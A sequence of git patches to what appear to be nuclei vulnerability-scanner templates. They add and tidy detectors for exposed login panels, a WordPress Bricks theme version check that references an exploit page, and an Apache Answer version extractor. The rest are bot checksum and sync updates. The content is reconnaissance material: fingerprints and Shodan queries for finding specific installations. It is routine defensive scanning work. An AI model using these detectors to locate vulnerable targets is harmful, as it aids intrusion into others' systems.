https://www.exploit-db.com/ghdb/6797 classification: @@ -13,6 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"JFrog" + verified: true tags: panel,jfrog,edb,detect,login http: @@ -21,7 +23,8 @@ http: - '{{BaseURL}}/ui/login/' - '{{BaseURL}}/ui/favicon.ico' - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - type: word words: @@ -30,4 +33,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" From 4d704580ad961377bbb23d9be1a171cd0768d410 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 12:49:55 +0530 Subject: [PATCH 143/375] minor update --- http/exposed-panels/matomo-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/matomo-panel.yaml b/http/exposed-panels/matomo-panel.yaml index fc32f136ce..840ab0a12a 100644 --- a/http/exposed-panels/matomo-panel.yaml +++ b/http/exposed-panels/matomo-panel.yaml @@ -2,7 +2,7 @@ id: matomo-panel info: name: Matomo Panel - Detect - author: Arr0way userdehghani + author: Arr0way,userdehghani severity: info description: | google analytics alternative that protects your data and your customers privacy. @@ -24,7 +24,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/index.php" - "{{BaseURL}}/plugins/CoreHome/images/favicon.png" @@ -42,4 +42,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))" From 7887810c9e93e2be8626ffc280525772f412f366 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 13:11:29 +0530 Subject: [PATCH 144/375] Update nocodb-panel.yaml --- http/exposed-panels/nocodb-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml index 17fa2772f9..4b13399b47 100644 --- a/http/exposed-panels/nocodb-panel.yaml +++ b/http/exposed-panels/nocodb-panel.yaml @@ -5,7 +5,7 @@ info: author: userdehghani severity: info description: | - no-code database platform that allows teams to collaborate and build applications with ease of a familiar and intuitive spreadsheet interface + NocoDB Login panel was discovered. reference: - https://www.nocodb.com/ - https://docs.nocodb.com/ @@ -32,4 +32,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" From 1031317bfc175efea792f9b7e327e46983e539d6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:44:14 +0000 Subject: [PATCH 145/375] Auto Generated New Template Addition List [Mon May 13 07:44:14 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4c86240f5c..9883216bfc 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml From 289af0c372699318be76e4ee4ac01d6f4112d087 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:44:19 +0000 Subject: [PATCH 146/375] Auto Generated Templates Checksum [Mon May 13 07:44:19 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7156777c2d..1a57ba8249 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3077,7 +3077,7 @@ http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 http/cves/2023/CVE-2023-36346.yaml:f524b20cf9dd61d63ba55a26895e1218ade1920b -http/cves/2023/CVE-2023-36347.yaml:25da245678a22835df7302ab8224f5c565c3ab05 +http/cves/2023/CVE-2023-36347.yaml:80107e418716ca04fb08977e478af1dde95045f3 http/cves/2023/CVE-2023-36844.yaml:adfddfa1ab5dd5cc0211d46e682bc1cc9952c672 http/cves/2023/CVE-2023-36845.yaml:c45751eb7a407e412cf60b85d55ec83cde5d3259 http/cves/2023/CVE-2023-36934.yaml:ccc28db870aa6f0010d0598e3a5300771ad902ef @@ -4098,6 +4098,7 @@ http/exposed-panels/nginx-admin-panel.yaml:492c1a52a4892201610677d018a5bccc85174 http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5 http/exposed-panels/nginx-ui-dashboard.yaml:1fc5b05816c393f8b7a6dbda82809da081e770af http/exposed-panels/ni-web-based-panel.yaml:1757bfbe129e69cbceae933ba2e363a706722866 +http/exposed-panels/nocodb-panel.yaml:fc710750e2f1c75d3d5ad7992a82cdeb8f350187 http/exposed-panels/noescape-login.yaml:7dae2defb736e4a2e4f595cd60ee6afbd8da2814 http/exposed-panels/nordex-wind-farm-portal.yaml:e6fd0977f64c3aa20c3e94134e2e617ef221fde3 http/exposed-panels/normhost-backup-server-manager.yaml:4ea654fd59759fc5b6fb404e3967142c7c5150c8 @@ -8511,7 +8512,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:437f7d074cf075e18b475cce70f25038eff51a57 +templates-checksum.txt:72f641f0ebfaf1455ef3098a40debeda024c799e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f371df3c57db4156ce8b10e6f9f8dcc7e94200f3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 13:14:47 +0530 Subject: [PATCH 147/375] Update ackee-panel.yaml --- http/exposed-panels/ackee-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index a93921badc..92ea911dec 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -18,7 +18,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/favicon.ico" stop-at-first-match: true @@ -32,4 +32,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" From 13356f4a649c23bcc87e5a80b9500a2f7f771def Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:44:59 +0000 Subject: [PATCH 148/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1334d4f766..d6acf5e0e2 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' From f4d05c2b99203350fd2a05a2b8b04b102ec0d467 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:46:01 +0000 Subject: [PATCH 149/375] Auto Template Signing [Mon May 13 07:46:01 UTC 2024] :robot: --- http/exposed-panels/nocodb-panel.yaml | 1 + http/exposed-panels/qlikview-accesspoint-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml index 4b13399b47..14b35e026c 100644 --- a/http/exposed-panels/nocodb-panel.yaml +++ b/http/exposed-panels/nocodb-panel.yaml @@ -33,3 +33,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" +# digest: 4a0a004730450220714636130a5e204032c15b6e2559e50c5dc598f220ac85fdf5d0d0d98feec3ee022100836baf611ae336e0d9d107a9c9d3acd8c159804a0632983e87209fb0819e2790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index 73e33204f8..7fdb0a05d8 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -28,3 +28,4 @@ http: - 'status_code == 200' - 'contains_any(to_lower(body), "qlikview - accesspoint", "alt=\"qlikview")' condition: and +# digest: 4a0a00473045022100a06d783199cb65eae6682616e041f14ba523e0f4d1e74241c6dee95de224ef4b02201fdc28b5e00862150ebb7320d3188b6d7a41b2b7377c8aca554768b3d99c435a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0ea9d174b71cddd4e21a0b2dcf6209c8b8827a20 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 13:22:35 +0530 Subject: [PATCH 150/375] Update and rename wordpress-bricks-builder-theme-detect.yaml to http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml --- .../theme/wp-bricks-builder-theme.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) rename wordpress-bricks-builder-theme-detect.yaml => http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml (62%) diff --git a/wordpress-bricks-builder-theme-detect.yaml b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml similarity index 62% rename from wordpress-bricks-builder-theme-detect.yaml rename to http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml index ceba2ead00..f6c971b7ea 100644 --- a/wordpress-bricks-builder-theme-detect.yaml +++ b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml @@ -1,12 +1,14 @@ -id: wordpress-bricks-builder-theme-detect +id: wp-bricks-builder-theme + info: - name: Detect WordPress Bricks Builder Theme Version <= 1.9.6 - author: yourname + name: WordPress Bricks Builder Theme Version + author: Anonymous severity: info - description: Checks for Bricks Builder Theme versions 1.9.6 and below. + description: | + - Checks for Bricks Builder Theme versions. reference: - https://0day.today/exploit/description/39489 - tags: wordpress,bricksbuilder,detection + tags: wordpress,theme,wp-theme,wp,bricks requests: - method: GET @@ -16,15 +18,14 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "Bricks Builder" - part: body - type: regex + part: body regex: - "Version\\s([0-1]\\.[0-8]\\.\\d+|1\\.9\\.[0-6])" - part: body - condition: or - type: status status: From ae23c96b4f1aab028bfb74f73d57f24a76553fd5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 13:27:50 +0530 Subject: [PATCH 151/375] Update wp-bricks-builder-theme.yaml --- .../wordpress/theme/wp-bricks-builder-theme.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml index f6c971b7ea..04e889ae01 100644 --- a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml @@ -10,7 +10,7 @@ info: - https://0day.today/exploit/description/39489 tags: wordpress,theme,wp-theme,wp,bricks -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/themes/bricks/readme.txt" @@ -20,12 +20,12 @@ requests: - type: word part: body words: - - "Bricks Builder" + - "Bricks - Visual Website Builder" - type: regex part: body regex: - - "Version\\s([0-1]\\.[0-8]\\.\\d+|1\\.9\\.[0-6])" + - "Stable tag:([ 0-9.]+)" - type: status status: From da86003cb78818de2a1cd0728da3fd5550999004 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 13:28:30 +0530 Subject: [PATCH 152/375] Update wp-bricks-builder-theme.yaml --- .../technologies/wordpress/theme/wp-bricks-builder-theme.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml index 04e889ae01..adae776bda 100644 --- a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml @@ -8,6 +8,10 @@ info: - Checks for Bricks Builder Theme versions. reference: - https://0day.today/exploit/description/39489 + metadata: + publicwww-query: "/wp-content/themes/bricks/" + verified: true + max-request: 1 tags: wordpress,theme,wp-theme,wp,bricks http: From 91a329c9c69dc413d1f1dd56451a9b589f8f7131 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 11:35:41 +0330 Subject: [PATCH 153/375] Add pocketbase-panel.yaml --- http/exposed-panels/pocketbase-panel.yaml | 35 +++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposed-panels/pocketbase-panel.yaml diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml new file mode 100644 index 0000000000..8fa30ab5be --- /dev/null +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -0,0 +1,35 @@ +id: pocketbase-panel + +info: + name: PocketBase Panel - Detect + author: userdehghani + severity: info + description: | + PocketBase Login panel was discovered. + reference: + - https://pocketbase.io/ + - https://pocketbase.io/docs/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:981081715 + tags: panel,nocodb,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/_/#/login" + - "{{BaseURL}}/_/images/favicon/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '<title>PocketBase' + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"981081715\" == mmh3(base64_py(body)))" \ No newline at end of file From a2a22a469aecd74c785ecb8f7f75cd68d1670d31 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <m.a.dehghani609@gmail.com> Date: Mon, 13 May 2024 11:37:57 +0330 Subject: [PATCH 154/375] Update pocketbase-panel.yaml --- http/exposed-panels/pocketbase-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml index 8fa30ab5be..963b47a412 100644 --- a/http/exposed-panels/pocketbase-panel.yaml +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:981081715 - tags: panel,nocodb,login,detect + tags: panel,pocketbase,login,detect http: - method: GET @@ -32,4 +32,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"981081715\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"981081715\" == mmh3(base64_py(body)))" From 0a786be1ed4fdb9cd99c5c4eb7bcca0bf148186d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 13:48:06 +0530 Subject: [PATCH 155/375] Update and rename apache-answer-version-detection-regex.yaml to http/technologies/apache/apache-answer-detect.yaml --- apache-answer-version-detection-regex.yaml | 28 ------------ .../apache/apache-answer-detect.yaml | 44 +++++++++++++++++++ 2 files changed, 44 insertions(+), 28 deletions(-) delete mode 100644 apache-answer-version-detection-regex.yaml create mode 100644 http/technologies/apache/apache-answer-detect.yaml diff --git a/apache-answer-version-detection-regex.yaml b/apache-answer-version-detection-regex.yaml deleted file mode 100644 index 85eceaa7ea..0000000000 --- a/apache-answer-version-detection-regex.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: apache-answer-version-detection-regex - -info: - name: Apache Answer Version Detection with Regex - author: Mohammad Reza Omrani | @omranisecurity - severity: info - description: Extracts the version of Apache Answer from the API endpoint using regex. - -requests: - - method: GET - path: - - "{{BaseURL}}/answer/api/v1/siteinfo/" - headers: - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - Referer: "{{BaseURL}}/users/login" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - name: version - regex: - - '"version":"([^"]+)"' diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml new file mode 100644 index 0000000000..c9a4562f57 --- /dev/null +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -0,0 +1,44 @@ +id: apache-answer-detect + +info: + name: Apache Answer - Detection + author: omranisecurity + severity: info + description: | + Detects Apache Answer version through API endpoit + reference: + - https://answer.apache.org/ + metadata: + shodan-query: html:"Apache Answer" + fofa-query: body="Apache Answer" + verified: true + max-request: 1 + tags: detect,tech,apache + +http: + - method: GET + path: + - "{{BaseURL}}/answer/api/v1/siteinfo" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"code":' + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: version + regex: + - '"version":"([^"]+)"' From 9bf8ab40aab23d9163298b0e169d59890c5cdcde Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 13 May 2024 13:48:57 +0530 Subject: [PATCH 156/375] updated matchers --- http/exposed-panels/ackee-panel.yaml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index 92ea911dec..d34adeec05 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -11,7 +11,7 @@ info: - https://docs.ackee.electerious.com/ metadata: verified: true - max-request: 1 + max-request: 2 shodan-query: http.favicon.hash:-1495233116 tags: panel,ackee,login,detect @@ -22,14 +22,9 @@ http: - "{{BaseURL}}/favicon.ico" stop-at-first-match: true - matchers-condition: or matchers: - - type: word - part: body - words: - - '<title>Ackee' - case-insensitive: true - - type: dsl dsl: + - 'status_code==200 && contains(tolower(body), "<title>ackee")' - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" + condition: or From 15bcf5caaed21630ca621742f98eb1274beea617 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:22:52 +0000 Subject: [PATCH 157/375] Auto Generated New Template Addition List [Mon May 13 08:22:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9883216bfc..63780ce4a5 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml +http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml From 6b2f20f648b12f06fcf0298495ec442b72145ade Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:22:55 +0000 Subject: [PATCH 158/375] Auto Generated Templates Checksum [Mon May 13 08:22:55 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1a57ba8249..b110c746ae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3484,6 +3484,7 @@ http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cc http/exposed-panels/acemanager-login.yaml:0197d85b74ad6a243f7722048e36b0fcd64f9862 http/exposed-panels/acenet-panel.yaml:b88e1211a38547cc9d8ee15228197eb2d9512430 http/exposed-panels/achecker-panel.yaml:5c7e9d3946502e0f479d98cb9a3ba27b2e5a9a9c +http/exposed-panels/ackee-panel.yaml:2e660b70c0043f4ff3630b1ea2bc757c8099d06b http/exposed-panels/acrolinx-dashboard.yaml:2238288d59b3af798ae446173975a84abb7dfcea http/exposed-panels/acti-panel.yaml:628420846539ed0cf69e5689f49ab4e57a26a451 http/exposed-panels/active-admin-exposure.yaml:504071b3c78140c2d6866df302226fe9f7bdd733 @@ -4098,7 +4099,7 @@ http/exposed-panels/nginx-admin-panel.yaml:492c1a52a4892201610677d018a5bccc85174 http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5 http/exposed-panels/nginx-ui-dashboard.yaml:1fc5b05816c393f8b7a6dbda82809da081e770af http/exposed-panels/ni-web-based-panel.yaml:1757bfbe129e69cbceae933ba2e363a706722866 -http/exposed-panels/nocodb-panel.yaml:fc710750e2f1c75d3d5ad7992a82cdeb8f350187 +http/exposed-panels/nocodb-panel.yaml:0519137744c936f9cff62dcf92e8b5885a9fef04 http/exposed-panels/noescape-login.yaml:7dae2defb736e4a2e4f595cd60ee6afbd8da2814 http/exposed-panels/nordex-wind-farm-portal.yaml:e6fd0977f64c3aa20c3e94134e2e617ef221fde3 http/exposed-panels/normhost-backup-server-manager.yaml:4ea654fd59759fc5b6fb404e3967142c7c5150c8 @@ -4234,7 +4235,7 @@ http/exposed-panels/pypicloud-panel.yaml:a8e13404f2ea40b2acaad8749a8c69b862e3b5e http/exposed-panels/qBittorrent-panel.yaml:0b49b83c08748b4b91db7e36fb06518a6d08ec88 http/exposed-panels/qdpm-login-panel.yaml:8f5b3e24b7156ab64d0d391ae05c299118ced753 http/exposed-panels/qlik-sense-server.yaml:4db84c0d1e3d5c1cfab2307ce8711291a039c6da -http/exposed-panels/qlikview-accesspoint-panel.yaml:6d6bd76d548c8b60544fdb95b3e8ea9ac7fefd18 +http/exposed-panels/qlikview-accesspoint-panel.yaml:cd944a5ea2366ac3dc76a3b95ad122a496f77738 http/exposed-panels/qmail-admin-login.yaml:4ba2c84becd76232e9b799bbc3433797e3d5a1f4 http/exposed-panels/qnap/qnap-photostation-panel.yaml:c7692c948143c7affd3ec7447e5038fe3ab23c6d http/exposed-panels/qnap/qnap-qts-panel.yaml:4939e5e7c6952bee595287b84575fad48db6435a @@ -8512,7 +8513,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:72f641f0ebfaf1455ef3098a40debeda024c799e +templates-checksum.txt:f801ac1e3065b02cb1c91d763ddae8019328bf37 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d33d8dfdd2a494eb58fbac8726f3112e0887dff4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:23:49 +0000 Subject: [PATCH 159/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d6acf5e0e2..9517d028d3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' From 765989482b14067098a2abf2ac7be7d2c502e137 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:24:43 +0000 Subject: [PATCH 160/375] Auto Template Signing [Mon May 13 08:24:43 UTC 2024] :robot: --- http/exposed-panels/ackee-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index d34adeec05..4a56df4878 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -28,3 +28,4 @@ http: - 'status_code==200 && contains(tolower(body), "<title>ackee")' - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" condition: or +# digest: 4b0a004830460221008f061832211cdc60b4f105a9623e07e810e376ebd87114c6c5d1a44384f7a50d022100e0170bd8a83aeb161c606e362f8752d638435fca57bf17b2b09f76dd7caa9350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 21837080a15bbd700d91e17513c9b72369f75a27 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 14:07:08 +0530 Subject: [PATCH 161/375] minor update --- http/honeypot/tpot-honeypot-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index 43470e4fa6..a999be727a 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -1,7 +1,7 @@ id: tpot-honeypot-detect info: - name: tpot Honeypot - Detect + name: T-Pot Honeypot - Detect author: rxerium severity: info description: | @@ -13,7 +13,7 @@ info: http: - method: GET path: - - "{{BaseURL}}:64297" + - "{{BaseURL}}" matchers-condition: and matchers: @@ -27,4 +27,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From 583b3c5a972a1588318d968ec2272bd9b88352e7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:40:57 +0000 Subject: [PATCH 162/375] Auto Generated New Template Addition List [Mon May 13 08:40:57 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 63780ce4a5..e39e76e6d8 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/exposed-panels/craftercms-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml +http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml From 20488788c7348a5d67625ed2c1bd9dcb61d2f409 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:41:41 +0000 Subject: [PATCH 163/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9517d028d3..05cd350984 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' + - 'http/honeypot/tpot-honeypot-detect.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' From 24a5456b82afe21ab3145b4de48946a099f4d1ee Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:42:15 +0000 Subject: [PATCH 165/375] Auto Generated Templates Checksum [Mon May 13 08:42:15 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b110c746ae..6bf43d12bd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3484,7 +3484,7 @@ http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cc http/exposed-panels/acemanager-login.yaml:0197d85b74ad6a243f7722048e36b0fcd64f9862 http/exposed-panels/acenet-panel.yaml:b88e1211a38547cc9d8ee15228197eb2d9512430 http/exposed-panels/achecker-panel.yaml:5c7e9d3946502e0f479d98cb9a3ba27b2e5a9a9c 